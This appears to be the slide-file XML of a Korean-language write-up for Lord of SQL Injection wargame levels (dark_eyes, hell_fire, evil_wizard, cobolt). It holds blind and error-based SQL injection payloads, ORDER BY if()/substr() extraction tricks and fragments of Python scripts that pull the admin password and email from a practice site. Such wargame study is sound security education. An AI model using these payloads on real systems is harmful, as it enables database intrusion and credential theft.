              <a:t>만 실행 된다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으로 길이를 알아내고 파이썬으로 찾으면 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87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FD33D-C691-4643-826C-765A6FEB32FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="339634" y="380890"/>
            <a:ext cx="121136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http://los.rubiya.kr/dark_eyes_4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600"/>
              <a:t>~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600"/>
              <a:t>c.php?pw=' or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600"/>
              <a:t> id=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600"/>
              <a:t> and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600"/>
              <a:t> (select 1 union select 2 where LENGTH(pw)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600"/>
              <a:t>=8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600"/>
              <a:t>)--%20</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>pw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>의 길이가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>이고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>, wordlis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>에서 찾아도 되고 이진탐색으로 찾아도 된다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>이번엔 참일 경우 에러메세지가 아무 것도 출력이 안 되니 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>라는 문자가 없다면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>result</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>에 저장하도록 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41BE7B-3240-4B8B-AF20-30CE460E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" y="1373081"/>
            <a:ext cx="918713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"rectoloia8cmiiu5udml2cpnj5"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(wordlist)):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"http://los.rubiya.kr/dark_eyes_4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c.php?pw=' or id='admin' and (select 1 union select 2 where substr(pw,"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",1)='"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+wordlist[j]+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"')--%20"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"query"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+=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wordlist[j]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91ED5-E54B-4486-9A58-488EE66A2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9" y="3542906"/>
            <a:ext cx="9191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6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1C45-379C-4D45-8443-13D507DB7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Hell_fire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22701-1E76-4609-907C-C593D7525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3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9F19EF-68C2-4D9C-8C70-FC0E34257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Cobolt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594893E-B37F-47BA-AF48-4D94DC3EB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84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A9446E-97D5-4225-8B9B-5CAF9FF76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" y="13967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id,email,score from prob_hell_fire where 1 order by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D2D0D7C-2AB8-44E7-A622-C185448D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2" y="1578618"/>
            <a:ext cx="833593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'/prob|_|\.|proc|union/i'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id,email,score from prob_hell_fire where 1 order by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"&lt;table border=1&gt;&lt;tr&gt;&lt;th&gt;id&lt;/th&gt;&lt;th&gt;email&lt;/th&gt;&lt;th&gt;score&lt;/th&gt;"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while((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"**************"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"&lt;tr&gt;&lt;td&gt;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&lt;/td&gt;&lt;/tr&gt;"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"&lt;/table&gt;&lt;hr&gt;query : &lt;strong&gt;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email from prob_hell_fire where id='admin' and email='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"hell_fire"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986D25-00B8-41CC-B2DC-548918893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97708"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="209210" y="8459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51560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09511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8446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rubiya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rubiya805@gmail.cm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**************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91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A85671-E80F-4544-B6CE-CFB3C07D9C4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8198075" y="1348167"/>
            <a:ext cx="3993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order by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>는 보통 뒤에 나오는 칼럼명을 기준으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>정렬</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>을 할 때 사용한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>칼럼명이나 조건뒤에서</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>내림차순이나 오름차순을</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>결정할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기본값은 오름차순</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>(ASC)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>이며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내림차순은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>DESC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en-US" altLang="ko-KR"/>
              <a:t>ex) order by id desc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>라면</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>칼럼을 기준으로 내림차순으로</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>정렬한다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99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3C8363-E59A-4C1F-B3C2-5B9A49216753}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="182879" y="293804"/>
            <a:ext cx="118262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처음엔 단순히</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>?order=if(id=‘admin’ and ord(substr(email),1,1)&lt;65536, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>score</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>를 하면</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>참</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 일 경우 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>순으로 정렬을 하고 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>거짓</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>일 경우 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>score</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>순으로 정렬을 하기 때문에</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>인 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>email</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>칼럼의 글자를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>blind sql injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>으로 찾을 수 있다고 생각했지만 작동하지 않았다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>그게 아니였고 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1"/>
              <a:t>각 모든 행을 다 비교해서 조건이 참인 행은 그 행의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1"/>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1"/>
              <a:t>를 반환받고</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1"/>
              <a:t>아닌 행은 그 행의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1"/>
              <a:t>score</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1"/>
              <a:t>를 반환</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>받기 때문에</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>rubiya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>행은 조건이 거짓이기 때문에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>score</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>를 반환받고 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>&gt;&gt; 100</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>행은 조건이 참이기 때문에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>를 반환받는다 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>&gt;&gt; admin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1"/>
              <a:t>그 다음 이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" b="1"/>
              <a:t>개를 기본값인 오름차순으로 정렬</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>하는 것이다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>그래서 원하는 대로 작동하지 않았고</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>만약 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>?order=if(id=‘admin’ and ord(substr(email),1,1)&lt;65536, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>score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id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>로 한다면</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>rubiya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>행은 조건이 거짓이기 때문에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>를 반환받고 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>&gt;&gt; rubiya</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>행은 조건이 참이기 때문에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>score</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>를 반환받는다 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>&gt;&gt; 200</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>이렇게 하면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>행이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>score</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>값은 더 높더라도 위에 나온다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>이렇게 칼럼명을 이용해서 반환받을 수 있고 문자열로도 반환받을 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>?order=if(id=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> and ord(substr(email),1,1)&lt;65536, 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en-US" altLang="ko-KR"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>를 한다면</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>참인 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>행은 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'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>를 반환받고</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>거짓인 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>rubiya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>행은 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ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>를 반환받기 때문에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>행이 더 위로 오게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016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835088-C5CA-4BDF-81C6-3B51BA75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29860"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4772499" y="587323"/>
          <a:ext cx="74195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167">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1451560876"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2473167">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3790951114"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2473167">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2798446167"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="297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rubiya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rubiya805@gmail.cm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9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52DAC5-C919-4EAE-BD3C-66B5FD7C6FC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="252547" y="194038"/>
            <a:ext cx="11939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if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>문으로 조건을 주어서 참일 경우 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>를 반환해서 오름차순</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>기본값</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>으로 정렬한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>그러면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>보다 더 작기 때문에 표가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>&gt;&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>이렇게 변하고 소스보기를 해서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특정 문자열</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>을 검사한다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1C328B-3FE8-4D48-B752-58CEA682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6" y="1856902"/>
            <a:ext cx="8090676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"vbepu9kt5urg358tg1dfvrosi7"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"http://los.rubiya.kr/hell_fire_3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5.php?order=if(id='admin' and ord(substr(email,"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200&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;rubiya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"http://los.rubiya.kr/hell_fire_3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5.php?order=if(id='admin' and ord(substr(email,"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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="900">
                <a:solidFill>
                  <a:srgbClr val="0070C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200&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;rubiya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3CA41-0FB8-43A4-837A-FBBD1D2F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49" y="5160296"/>
            <a:ext cx="8963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5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7DB7-3C03-4403-9995-3DB0E7A3C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Evil_wizard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FDF46-D3B1-49E5-87D4-3826E442B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20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E6D895-A593-4538-863C-09E2818F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" y="213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 :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id,email,score from prob_evil_wizard where 1 order by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11C936-4982-4F3C-A029-3D0C92A9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" y="417153"/>
            <a:ext cx="1102577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&lt;?php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"./config.php"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'/prob|_|\.|proc|union|sleep|benchmark/i'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exit(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"No Hack ~_~"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id,email,score from prob_evil_wizard where 1 order by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order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// same with hell_fire? really?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80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"&lt;table border=1&gt;&lt;tr&gt;&lt;th&gt;id&lt;/th&gt;&lt;th&gt;email&lt;/th&gt;&lt;th&gt;score&lt;/th&gt;"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while((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$rows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if(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'id'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"admin"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"**************"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"&lt;tr&gt;&lt;td&gt;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&lt;/td&gt;&lt;td&gt;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&lt;/td&gt;&lt;/tr&gt;"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echo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"&lt;/table&gt;&lt;hr&gt;query : &lt;strong&gt;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&lt;/strong&gt;&lt;hr&gt;"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addslashes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"select email from prob_evil_wizard where id='admin' and email='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email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$query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if((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&amp;&amp; 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===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'email'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"evil_wizard"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CAB6D-F6AF-4E8F-8C07-0C20EF186739}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="159798" y="6339841"/>
            <a:ext cx="107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 점은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>score</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>가 다르다는 거지만 찾을 때 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>score</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>를 사용하지 않았기 때문에 같은 코드로 찾았다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343486-2C51-4441-A64E-0D26CFCA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48559"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4511242" y="5168031"/>
          <a:ext cx="752096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87">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1451560876"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2506987">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3790951114"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2506987">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2798446167"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="297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score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admin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**************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rubiya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rubiya805@gmail.com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83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1C535-EF70-4349-989B-F1DDA1F6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66" y="219868"/>
            <a:ext cx="8494633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requests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 = {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"PHPSESSID"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"vbepu9kt5urg358tg1dfvrosi7"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#wordlist = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789~!@#$^&amp;*()-_+"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(start == end):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 = (start + end) /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"http://los.rubiya.kr/evil_wizard_3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d.php?order=if(id='admin' and ord(substr(email,"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",1))&gt;"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",'a','b')"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"50&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;rubiya"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url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"http://los.rubiya.kr/evil_wizard_3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d.php?order=if(id='admin' and ord(substr(email,"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",1))&lt;"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",'a','b')"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 = requests.get(url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cookies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=cookie)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"50&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;rubiya"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r.text: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result +=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unichr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(mid)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search(i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65536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7A0CEF-1D92-426A-91F4-0151C978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4051686"/>
            <a:ext cx="8143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78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88BFC-7D85-42D4-BE29-2C1C16657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Green_dragon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1A4FC-B125-4C77-BE80-6368AF953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760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56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C9A6B9-97B2-466D-A6FE-E42A1114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1" y="4288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prob_cobolt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=md5('')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005D88-E282-4A72-88C2-3C0034871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21" y="548673"/>
            <a:ext cx="117293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prob_cobolt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=md5('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')"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cobolt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elseif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:(&lt;/h2&gt;"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41358-E890-4D20-B2EA-C953C8C785D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="322217" y="4726496"/>
            <a:ext cx="11729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php md5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>함수는 단방향 함수로서 암호화는 가능하지만 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>복호화하는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 함수는 없다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>pw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>md5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>해쉬로</a:t>
            </a:r>
            <a:r>
